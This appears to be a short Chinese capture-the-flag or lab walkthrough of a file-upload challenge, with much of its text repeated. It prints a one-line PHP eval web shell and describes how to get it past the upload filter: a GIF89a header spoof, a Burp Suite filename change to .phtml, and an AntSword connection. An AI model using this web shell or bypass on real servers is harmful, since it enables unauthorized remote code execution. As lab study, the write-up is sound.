试着上传一个一句话木马的.jpg文件
<?php eval($_GET['abc']); ?>
看样子是不能用php,必须换一种语言
仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗
GIF89a图片头文件欺骗
上传成功了,接下来我们在BP中上传,截获数据包,并且把 Content-Disposition中的filename更改后缀
发送后就可以用蚁剑链接,注意路径/upload/upload.phtml
试着上传一个一句话木马的.jpg文件
<?php eval($_GET['abc']); ?>
看样子是不能用php,必须换一种语言
仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗
上传成功了,接下来我们在BP中上传,截获数据包,并且把 Content-Disposition中的filename更改后缀
发送后就可以用蚁剑链接,注意路径/upload/upload.phtml